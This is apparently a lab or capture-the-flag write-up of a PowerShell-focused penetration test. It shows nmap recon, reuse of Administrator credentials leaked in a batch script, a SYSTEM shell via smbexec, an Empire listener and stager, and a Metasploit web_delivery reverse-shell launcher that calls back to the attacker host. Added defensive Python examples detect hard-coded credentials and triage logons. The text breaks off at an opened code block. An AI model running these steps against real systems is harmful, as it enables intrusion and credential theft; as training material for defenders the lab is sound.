Leveraging PowerShell During Exploitation
Overview
Scenario
You have been tasked by an organization to conduct a penetration test. Suppose that the organization’s internet-facing machine is accessible at demo.ine.local. There is another machine (fileserver.ine.local) which is not directly accessible.
Task: Perform remote exploitation and post-exploitation tasks on vulnerable systems, gain access to both machines and retrieve the flag!
Learning Objectives
- Identify vulnerabilities from a remote exploitation perspective.
- Exploit discovered vulnerabilities.
- Obtain access to machines that are not directly accessible.
- Use PowerShell and related tools for tasks where applicable.
Recommended tools
- Empire
- Smbexec
- Nmap
- Metasploit
Tasks
Task 1: Identify a vulnerability in an internet-facing system. Use that vulnerability to obtain access and execute remote commands.
One of the systems accessible at demo.ine.local contains a vulnerability or misconfiguration. Identify it and obtain access to the vulnerable target with the ability to execute commands.
Task 2: Use Empire to obtain a connection from the target via an Empire Agent
Using your ability to execute remote commands on the vulnerable system, use Empire to generate a PowerShell-based stager and obtain an agent connection from the target. Then use Empire modules to conduct reconnaissance of the system and the internal network.
Task 3: Exploit a second system that is not directly accessible.
Use the compromised system as a pivot to exploit the fileserver.ine.local machine.
My Lab Experience
```
root@attackdefense:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.1.0.7 netmask 255.255.0.0 broadcast 10.1.255.255
ether 02:42:0a:01:00:07 txqueuelen 0 (Ethernet)
RX packets 1790 bytes 161499 (157.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1973 bytes 1902488 (1.8 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.16.2 netmask 255.255.255.0 broadcast 10.10.16.255
ether 02:42:0a:0a:10:02 txqueuelen 0 (Ethernet)
RX packets 12 bytes 908 (908.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
```
Kali Linux: 10.10.16.2
```
root@attackdefense:~# cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.1.0.7 attackdefense.com attackdefense
127.0.0.1 AttackDefense-Kali
10.10.16.2 attackdefense.com attackdefense
10.0.26.27 demo.ine.local
10.0.20.241 fileServer.ine.local
```
10.0.26.27 demo.ine.local
10.0.20.241 fileServer.ine.local
```
root@attackdefense:~# ping -c 4 demo.ine.local
PING demo.ine.local (10.0.28.198) 56(84) bytes of data.
64 bytes from demo.ine.local (10.0.28.198): icmp_seq=1 ttl=125 time=4.04 ms
64 bytes from demo.ine.local (10.0.28.198): icmp_seq=2 ttl=125 time=2.90 ms
64 bytes from demo.ine.local (10.0.28.198): icmp_seq=3 ttl=125 time=2.74 ms
64 bytes from demo.ine.local (10.0.28.198): icmp_seq=4 ttl=125 time=2.83 ms
--- demo.ine.local ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 2.738/3.126/4.036/0.528 ms
root@attackdefense:~# ping -c 4 fileServer.ine.local
PING fileServer.ine.local (10.0.28.115) 56(84) bytes of data.
--- fileServer.ine.local ping statistics ---
4 packets transmitted, 0 received, 100% packet loss, time 3075ms
```
```
root@attackdefense:~# nmap demo.ine.local
Starting Nmap 7.92 ( https://nmap.org ) at 2024-06-15 12:25 IST
Nmap scan report for demo.ine.local (10.0.26.27)
Host is up (0.0028s latency).
Not shown: 992 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds
```
```
root@attackdefense:~# nmap -p- demo.ine.local
Starting Nmap 7.92 ( https://nmap.org ) at 2024-06-15 12:26 IST
Nmap scan report for demo.ine.local (10.0.26.27)
Host is up (0.0028s latency).
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
4983/tcp open unknown
5985/tcp open wsman
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49173/tcp open unknown
49174/tcp open unknown
49180/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 21.01 seconds
```
```
http://10.0.26.27:4983/
```
```batch
@echo off
net use "\\fileserver\C$" /user:Administrator abc_123321!@#
if exist "\\fileserver\C$\Program_Files\MSBuild\ErrorLog.txt" (
    echo "Copying errors\..."
    copy "\\fileserver\C$\Program_Files\MSBuild\ErrorLog.txt" C:\Users\local_admin\Logs\Host1\
    del "\\fileserver\C$\Program_Files\MSBuild\ErrorLog.txt"
) else (
    echo "No errors!"
)
net use "\\fileserver\C$" /delete
```
Credentials found in the script:
```
Administrator abc_123321!@#
```
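The script served on port 4983 is the whole vulnerability here: a scheduled-task batch file that passes the fileserver's Administrator password to `net use` on the command line. The following is an added example, not part of the original write-up, showing a defender-side check that scans scripts for exactly this pattern and produces a redacted copy for a report. It handles only the `net use` syntax; the first sample script is the one from the lab, the second is constructed.

```python
"""Find hard-coded credentials in batch/PowerShell scripts.

Added example, not part of the original lab write-up: a defender-side
check for the kind of mistake the scheduled-task script above made, namely
passing a password to `net use` on the command line. Only the `net use`
syntax is handled; the second sample script is constructed.
"""
import re
from typing import Dict, List

# net use [X:] <share> [password] /user:<name> [password] [/switches]
# cmd.exe accepts the password either before or after /user:, so both
# positions are captured. A '*' after /user: means "prompt", not a secret.
NET_USE_RE = re.compile(
    r"""net\s+use\s+(?:[A-Za-z]:\s+)?          # optional drive letter
        (?P<share>"[^"]+"|\S+)                  # UNC path, quoted or bare
        (?:\s+(?P<pw_before>(?!/)\S+))?         # password given before /user:
        \s+/user:(?P<user>\S+)
        (?:\s+(?P<pw_after>(?!/)(?!\*)\S+))?    # password given after /user:
    """,
    re.IGNORECASE | re.VERBOSE,
)


def find_hardcoded_credentials(script: str) -> List[Dict[str, object]]:
    """Return one finding per `net use` line that carries a literal password."""
    findings = []
    for lineno, line in enumerate(script.splitlines(), 1):
        for m in NET_USE_RE.finditer(line):
            password = m.group("pw_after") or m.group("pw_before")
            if password:
                findings.append({
                    "line": lineno,
                    "share": m.group("share").strip('"'),
                    "user": m.group("user"),
                    "password": password,
                })
    return findings


def redact(script: str) -> str:
    """Copy of the script with every discovered password replaced; safe to paste in a report."""
    for finding in find_hardcoded_credentials(script):
        script = script.replace(str(finding["password"]), "<redacted>")
    return script


# The scheduled-task script exposed by the lab target (copied from above).
LAB_SCRIPT = r"""
@echo off
net use "\\fileserver\C$" /user:Administrator abc_123321!@#
if exist "\\fileserver\C$\Program_Files\MSBuild\ErrorLog.txt" (
    echo "Copying errors\..."
    copy "\\fileserver\C$\Program_Files\MSBuild\ErrorLog.txt" C:\Users\local_admin\Logs\Host1\
    del "\\fileserver\C$\Program_Files\MSBuild\ErrorLog.txt"
) else (
    echo "No errors!"
)
net use "\\fileserver\C$" /delete
""".strip()

# Constructed sample (not from the lab): password before /user:, a prompted
# password ('*') that must not be reported, and a plain disconnect.
CONSTRUCTED_SCRIPT = r"""
rem constructed sample
net use Z: \\corp-fs01\backup S3cret! /user:CORP\svc_backup /persistent:no
net use \\corp-fs01\logs /user:CORP\svc_backup *
net use Z: /delete
""".strip()

if __name__ == "__main__":
    for name, text in (("lab", LAB_SCRIPT), ("constructed", CONSTRUCTED_SCRIPT)):
        for f in find_hardcoded_credentials(text):
            print(f"[{name}] line {f['line']}: {f['user']} -> {f['share']} (password in clear text)")
    print(redact(LAB_SCRIPT))
```

The fix on the defending side is the same regardless of how the check is run: scheduled-task scripts should map shares under the task's own service account (or a managed service account) instead of embedding a password, and any script found this way should trigger a password rotation because the file was readable by whoever could reach port 4983.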
```
root@attackdefense:~/Desktop/tools/portable# find / -name smbexec.py
/root/impacket/examples/smbexec.py
find: ‘/proc/tty/driver’: Permission denied
/usr/lib/python3/dist-packages/cme/protocols/smb/smbexec.py
/usr/local/bin/smbexec.py
/usr/share/doc/python3-impacket/examples/smbexec.py
```
SmbExec/ScExec
```
root@attackdefense:~# smbexec.py 'Administrator:abc_123321!@#'@10.0.26.27
Impacket v0.9.25.dev1+20220131.200424.badf09d - Copyright 2021 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . : ap-southeast-1.compute.internal
Link-local IPv6 Address . . . . . : fe80::b870:ab1f:5f69:9cd0%13
IPv4 Address. . . . . . . . . . . : 10.0.26.27
Subnet Mask . . . . . . . . . . . : 255.255.240.0
Default Gateway . . . . . . . . . : 10.0.16.1
Tunnel adapter isatap.ap-southeast-1.compute.internal:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : ap-southeast-1.compute.internal
```
Internal network: 10.0.16.0/20 (subnet mask 255.255.240.0)
```
root@attackdefense:~# powershell-empire server
```
```
root@attackdefense:~# powershell-empire client
```
```
(Empire) > uselistener http
Author @harmj0y
Description Starts a http[s] listener (PowerShell or Python) that uses a GET/POST
approach.
Name HTTP[S]
┌Record Options────┬─────────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name │ Value │ Required │ Description │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ BindIP │ 0.0.0.0 │ True │ The IP to bind to on the control │
│ │ │ │ server. │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ CertPath │ │ False │ Certificate path for https │
│ │ │ │ listeners. │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Cookie │ PxALwiuAQykPeAJ │ False │ Custom Cookie Name │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DefaultDelay │ 5 │ True │ Agent delay/reach back interval (in │
│ │ │ │ seconds). │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DefaultJitter │ 0.0 │ True │ Jitter in agent reachback interval │
│ │ │ │ (0.0-1.0). │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DefaultLostLimit │ 60 │ True │ Number of missed checkins before │
│ │ │ │ exiting │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DefaultProfile │ /admin/get.php,/news.php,/login/pro │ True │ Default communication profile for │
│ │ cess.php|Mozilla/5.0 (Windows NT │ │ the agent. │
│ │ 6.1; WOW64; Trident/7.0; rv:11.0) │ │ │
│ │ like Gecko │ │ │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Headers │ Server:Microsoft-IIS/7.5 │ True │ Headers for the control server. │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Host │ http://10.1.0.7 │ True │ Hostname/IP for staging. │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ KillDate │ │ False │ Date for the listener to exit │
│ │ │ │ (MM/dd/yyyy). │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Launcher │ powershell -noP -sta -w 1 -enc │ True │ Launcher string. │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Name │ http │ True │ Name for the listener. │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Port │ │ True │ Port for the listener. │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy │ default │ False │ Proxy to use for request (default, │
│ │ │ │ none, or other). │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds │ default │ False │ Proxy credentials │
│ │ │ │ ([domain\]username:password) to use │
│ │ │ │ for request (default, none, or │
│ │ │ │ other). │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ SlackURL │ │ False │ Your Slack Incoming Webhook URL to │
│ │ │ │ communicate with your Slack │
│ │ │ │ instance. │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ StagerURI │ │ False │ URI for the stager. Must use │
│ │ │ │ /download/. Example: │
│ │ │ │ /download/stager.php │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ StagingKey │ eA9TaKPo>i(%fUk2s|b_t7-V)5p4~jGL │ True │ Staging key for initial agent │
│ │ │ │ negotiation. │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent │ default │ False │ User-agent string to use for the │
│ │ │ │ staging request (default, none, or │
│ │ │ │ other). │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ WorkingHours │ │ False │ Hours for the agent to operate │
│ │ │ │ (09:00-17:00). │
└──────────────────┴─────────────────────────────────────┴──────────┴─────────────────────────────────────┘
(Empire: uselistener/http) > set Host 10.10.16.2
[*] Set Host to 10.10.16.2
(Empire: uselistener/http) > set Port 8888
[*] Set Port to 8888
(Empire: uselistener/http) > execute
[+] Listener http successfully started
(Empire: uselistener/http) > listeners
┌Listeners List──────┬───────────────────┬─────────────────────────────────────────┬─────────┐
│ ID │ Name │ Module │ Listener Category │ Created At │ Enabled │
├────┼──────┼────────┼───────────────────┼─────────────────────────────────────────┼─────────┤
│ 1 │ http │ http │ client_server │ 2024-06-15 15:33:45 IST (7 seconds ago) │ True │
└────┴──────┴────────┴───────────────────┴─────────────────────────────────────────┴─────────┘
```
Note: set Host to the bare IP address, without the http:// prefix; otherwise a network error occurs.
```
(Empire: listeners) > usestager multi/launcher
Author @harmj0y
Description Generates a one-liner stage0 launcher for Empire.
Name multi/launcher
┌Record Options────┬────────────────────┬──────────┬─────────────────────────────────────┐
│ Name │ Value │ Required │ Description │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ Base64 │ True │ True │ Switch. Base64 encode the output. │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ Bypasses │ mattifestation etw │ False │ Bypasses as a space separated list │
│ │ │ │ to be prepended to the launcher │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ Language │ powershell │ True │ Language of the stager to generate. │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener │ │ True │ Listener to generate stager for. │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ Obfuscate │ False │ False │ Switch. Obfuscate the launcher │
│ │ │ │ powershell code, uses the │
│ │ │ │ ObfuscateCommand for obfuscation │
│ │ │ │ types. For powershell only. │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ ObfuscateCommand │ Token\All\1 │ False │ The Invoke-Obfuscation command to │
│ │ │ │ use. Only used if Obfuscate switch │
│ │ │ │ is True. For powershell only. │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ OutFile │ │ False │ Filename that should be used for │
│ │ │ │ the generated output. │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy │ default │ False │ Proxy to use for request (default, │
│ │ │ │ none, or other). │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds │ default │ False │ Proxy credentials │
│ │ │ │ ([domain\]username:password) to use │
│ │ │ │ for request (default, none, or │
│ │ │ │ other). │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ SafeChecks │ True │ True │ Switch. Checks for LittleSnitch or │
│ │ │ │ a SandBox, exit the staging process │
│ │ │ │ if true. Defaults to True. │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ StagerRetries │ 0 │ False │ Times for the stager to retry │
│ │ │ │ connecting. │
├──────────────────┼────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent │ default │ False │ User-agent string to use for the │
│ │ │ │ staging request (default, none, or │
│ │ │ │ other). │
└──────────────────┴────────────────────┴──────────┴─────────────────────────────────────┘
(Empire: usestager/multi/launcher) > set Listener http
[*] Set Listener to http
(Empire: usestager/multi/launcher) > execute
powershell -noP -sta -w 1 -enc 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
(Empire: usestager/multi/launcher) >
```
Run the PowerShell launcher above in the shell obtained through smbexec.
```
[+] Plugin csharpserver ran successfully!
[+] empireadmin connected to socketio
[*] Starting listener 'http'
[+] Listener successfully started!
[*] Sending POWERSHELL stager (stage 1) to 10.0.26.27
[*] New agent W3986BFX checked in
[+] Initial agent W3986BFX from 10.0.26.27 now active (Slack)
[*] Sending agent (stage 2) to W3986BFX at 10.0.26.27
Server >
```
```
[+] New agent W3986BFX checked in
[*] Sending agent (stage 2) to W3986BFX at 10.0.26.27
(Empire: usestager/multi/launcher) > agents
┌Agents──────────┬────────────┬─────────────┬──────────────────┬────────────┬──────┬───────┬─────────────────────────┬──────────┐
│ ID │ Name │ Language │ Internal IP │ Username │ Process │ PID │ Delay │ Last Seen │ Listener │
├────┼───────────┼────────────┼─────────────┼──────────────────┼────────────┼──────┼───────┼─────────────────────────┼──────────┤
│ 1 │ W3986BFX* │ powershell │ 10.0.26.27 │ WORKGROUP\SYSTEM │ powershell │ 2128 │ 5/0.0 │ 2024-06-15 15:41:40 IST │ http │
│ │ │ │ │ │ │ │ │ (4 seconds ago) │ │
└────┴───────────┴────────────┴─────────────┴──────────────────┴────────────┴──────┴───────┴─────────────────────────┴──────────┘
```
```
(Empire: agents) > usemodule powershell/situational_awareness/host/computerdetails
Author @JosephBialek
Background True
Comments https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-
ComputerDetails.ps1
Description Enumerates useful information on the system. By default, all checks
are run.
Language powershell
Name powershell/situational_awareness/host/computerdetails
NeedsAdmin True
OpsecSafe True
Techniques http://attack.mitre.org/techniques/T1082
┌Record Options──┬────────────┬──────────┬─────────────────────────────────────┐
│ Name │ Value │ Required │ Description │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ 4624 │ │ False │ Switch. Only return 4624 logon │
│ │ │ │ information (logons to this │
│ │ │ │ machine). │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ 4648 │ │ False │ Switch. Only return 4648 logon │
│ │ │ │ information (RDP to another │
│ │ │ │ machine). │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ Agent │ │ True │ Agent to run module on. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ AppLocker │ │ False │ Switch. Only return AppLocker logs. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ Limit │ 100 │ False │ Limit the number of event log │
│ │ │ │ entries returned. Defaults to 100 │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ OutputFunction │ Out-String │ False │ PowerShell's output function to use │
│ │ │ │ ("Out-String", "ConvertTo-Json", │
│ │ │ │ "ConvertTo-Csv", "ConvertTo-Html", │
│ │ │ │ "ConvertTo-Xml"). │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ PSScripts │ │ False │ Switch. Only return PowerShell │
│ │ │ │ scripts run from operational log. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ SavedRDP │ │ False │ Switch. Only return saved RDP │
│ │ │ │ connections. │
└────────────────┴────────────┴──────────┴─────────────────────────────────────┘
(Empire: usemodule/powershell/situational_awareness/host/computerdetails) > set Agent W3986BFX
[*] Set Agent to W3986BFX
(Empire: usemodule/powershell/situational_awareness/host/computerdetails) > execute
[*] Tasked W3986BFX to run Task 1
```
```
(Empire: agents) > interact W3986BFX
[*] Task 1 results received
Event ID 4624 (Logon):
LogonType : 3
NewLogonAccountName : Administrator
SourcePort : 42178
SourceNetworkAddress : 10.10.16.2
Times : {6/15/2024 9:58:47 AM}
LogSource : Security
SourceAccountName : -
WorkstationName : -
Count : 1
SourceDomainName : -
NewLogonAccountDomain : ATTACKDEFENSE
LogType : 4624
LogonType : 3
NewLogonAccountName : Administrator
SourcePort : -
SourceNetworkAddress : -
Times : {1/12/2022 11:29:12 AM}
LogSource : Security
SourceAccountName : -
WorkstationName : attackdefense
Count : 1
SourceDomainName : -
NewLogonAccountDomain : ATTACKDEFENSE
LogType : 4624
LogonType : 10
NewLogonAccountName : Administrator
SourcePort : 0
SourceNetworkAddress : 172.104.52.153
Times : {1/12/2022 11:29:13 AM}
LogSource : Security
SourceAccountName : ATTACKDEFENSE$
WorkstationName : ATTACKDEFENSE
Count : 1
SourceDomainName : WORKGROUP
LogType : 4624
```
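The 4624 records the module returned are worth reading from the other side of the fence: the first one is the smbexec logon itself (network logon, type 3, as Administrator, from the Kali box on port 42178), and the third is an older RDP logon (type 10) from a public address. The following is an added example, not part of the original write-up, that parses records in exactly this Out-String layout and flags the ones a defender would want to look at. The management network allow-list is an assumption; the records are copied from the output above.

```python
"""Triage Event ID 4624 logon records in the layout Get-ComputerDetails prints.

Added example, not part of the original lab write-up. MANAGEMENT_NETS is an
assumed allow-list; SAMPLE_OUTPUT is copied from the module output above.
"""
import ipaddress
from typing import Dict, List

# Assumption: admins only connect from the target's own /20. Anything else,
# including the lab's Kali host at 10.10.16.2, counts as unexpected.
MANAGEMENT_NETS = [ipaddress.ip_network("10.0.16.0/20")]

LOGON_TYPE_NAMES = {2: "Interactive", 3: "Network", 5: "Service", 7: "Unlock",
                    10: "RemoteInteractive (RDP)", 11: "CachedInteractive"}

SAMPLE_OUTPUT = """
Event ID 4624 (Logon):
LogonType : 3
NewLogonAccountName : Administrator
SourcePort : 42178
SourceNetworkAddress : 10.10.16.2
Times : {6/15/2024 9:58:47 AM}
LogSource : Security
SourceAccountName : -
WorkstationName : -
Count : 1
SourceDomainName : -
NewLogonAccountDomain : ATTACKDEFENSE
LogType : 4624
LogonType : 3
NewLogonAccountName : Administrator
SourcePort : -
SourceNetworkAddress : -
Times : {1/12/2022 11:29:12 AM}
LogSource : Security
SourceAccountName : -
WorkstationName : attackdefense
Count : 1
SourceDomainName : -
NewLogonAccountDomain : ATTACKDEFENSE
LogType : 4624
LogonType : 10
NewLogonAccountName : Administrator
SourcePort : 0
SourceNetworkAddress : 172.104.52.153
Times : {1/12/2022 11:29:13 AM}
LogSource : Security
SourceAccountName : ATTACKDEFENSE$
WorkstationName : ATTACKDEFENSE
Count : 1
SourceDomainName : WORKGROUP
NewLogonAccountDomain : ATTACKDEFENSE
LogType : 4624
"""


def parse_logon_records(text: str) -> List[Dict[str, str]]:
    """Split 'Key : Value' lines into one dict per record; LogonType opens a record."""
    records: List[Dict[str, str]] = []
    current = None
    for line in text.splitlines():
        if " : " not in line:          # header line such as "Event ID 4624 (Logon):"
            continue
        key, value = (part.strip() for part in line.split(" : ", 1))
        if key == "LogonType":
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
    return records


def triage_logons(records: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return the records that deserve analyst attention, each with its reasons."""
    findings = []
    for rec in records:
        logon_type = int(rec.get("LogonType", "0"))
        src = rec.get("SourceNetworkAddress", "-")
        addr = ipaddress.ip_address(src) if src not in ("-", "", "::1", "127.0.0.1") else None
        reasons = []
        if addr is not None:
            if not addr.is_private:
                reasons.append("source is a public address")
            elif not any(addr in net for net in MANAGEMENT_NETS):
                reasons.append("source outside the management networks")
            if logon_type == 3 and rec.get("NewLogonAccountName") == "Administrator":
                reasons.append("network logon with the built-in Administrator account")
            if logon_type == 10 and not addr.is_private:
                reasons.append("RDP logon from the internet")
        if reasons:
            findings.append({
                "account": f'{rec.get("NewLogonAccountDomain", "")}\\{rec.get("NewLogonAccountName", "")}',
                "logon_type": logon_type,
                "logon_type_name": LOGON_TYPE_NAMES.get(logon_type, "Other"),
                "source": src,
                "port": rec.get("SourcePort", "-"),
                "time": rec.get("Times", "-").strip("{}"),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in triage_logons(parse_logon_records(SAMPLE_OUTPUT)):
        print(f"{f['time']}  {f['account']}  {f['logon_type_name']} from {f['source']}:{f['port']}")
        for r in f["reasons"]:
            print("    -", r)
```

The same two conditions (built-in Administrator used over the network from outside the admin range, and RDP reachable from the internet) are what the lab's port scan and the exposed 3389/tcp on both hosts already hinted at; on a real estate they are cheap to alert on straight from the Security log without an agent.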
```
(Empire: W3986BFX) > usemodule powershell/situational_awareness/network/portscan
[*] Set Agent to W3986BFX
Author Rich Lundeen
Background True
Comments https://github.com/mattifestation/PowerSploit/blob/master/Recon/Invoke
-Portscan.ps1
Description Does a simple port scan using regular sockets, based (pretty) loosely
on nmap.
Language powershell
Name powershell/situational_awareness/network/portscan
NeedsAdmin False
OpsecSafe True
Techniques http://attack.mitre.org/techniques/T1046
┌Record Options──┬────────────┬──────────┬─────────────────────────────────────┐
│ Name │ Value │ Required │ Description │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ Agent │ W3986BFX │ True │ Agent to run module on. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ AllformatsOut │ │ False │ Output file of all formats. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ ExcludeHosts │ │ False │ Exclude thsee comma separated │
│ │ │ │ hosts. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ GrepOut │ │ False │ Greppable (.gnmap) output file. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ HostFile │ │ False │ Input hosts from file (on the │
│ │ │ │ target) │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ Hosts │ │ False │ Hosts to scan. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ Open │ True │ False │ Switch. Only show hosts with open │
│ │ │ │ ports. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ OutputFunction │ Out-String │ False │ PowerShell's output function to use │
│ │ │ │ ("Out-String", "ConvertTo-Json", │
│ │ │ │ "ConvertTo-Csv", "ConvertTo-Html", │
│ │ │ │ "ConvertTo-Xml"). │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ PingOnly │ │ False │ Switch. Ping only, don't scan for │
│ │ │ │ ports. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ Ports │ │ False │ Comma separated ports to scan for. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ ReadableOut │ │ False │ Readable (.nmap) output file. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ SkipDiscovery │ │ False │ Switch. Treat all hosts as online. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ TopPorts │ │ False │ Scan for X top ports, default 50. │
├────────────────┼────────────┼──────────┼─────────────────────────────────────┤
│ XmlOut │ │ False │ .XML output file. │
└────────────────┴────────────┴──────────┴─────────────────────────────────────┘
(Empire: usemodule/powershell/situational_awareness/network/portscan) > set Hosts 10.0.20.241
[*] Set Hosts to 10.0.20.241
(Empire: usemodule/powershell/situational_awareness/network/portscan) > execute
[*] Tasked W3986BFX to run Task 2
[*] Task 2 results received
Job started: P4MCXN
[*] Task 2 results received
Hostname OpenPorts
-------- ---------
10.0.20.241 80,3389,445,139,135
```
```
root@attackdefense:~# msfconsole -q
msf6 > search web_delivery
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/postgres/postgres_copy_from_program_cmd_exec 2019-03-20 excellent Yes PostgreSQL COPY FROM PROGRAM Command Execution
1 exploit/multi/script/web_delivery 2013-07-19 manual No Script Web Delivery
Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/script/web_delivery
msf6 > use 1
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > show targets
Exploit targets:
Id Name
-- ----
0 Python
1 PHP
2 PSH
3 Regsvr32
4 pubprn
5 SyncAppvPublishingServer
6 PSH (Binary)
7 Linux
8 Mac OS X
msf6 exploit(multi/script/web_delivery) > set target PSH
target => PSH
msf6 exploit(multi/script/web_delivery) > show options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to
listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 PSH
msf6 exploit(multi/script/web_delivery) > set SRVHOST 10.10.16.2
SRVHOST => 10.10.16.2
msf6 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set LHOST 10.10.16.2
LHOST => 10.10.16.2
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.16.2:4444
[*] Using URL: http://10.10.16.2:8080/ih5YT1w
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e 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
msf6 exploit(multi/script/web_delivery) >
```
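Both launchers in this write-up, the Empire stager (`powershell -noP -sta -w 1 -enc ...`) and the web_delivery one-liner just generated (`powershell.exe -nop -w hidden -e ...`), have the same command-line shape, and that shape is one of the most reliable things to alert on from Sysmon Event ID 1 or 4688 with command-line auditing enabled. The following is an added example, not part of the original write-up or of either tool, that scores process-creation command lines on those traits and decodes the `-EncodedCommand` blob to look for a download cradle. The events are constructed; the URL in the cradle text is the one web_delivery printed above.

```python
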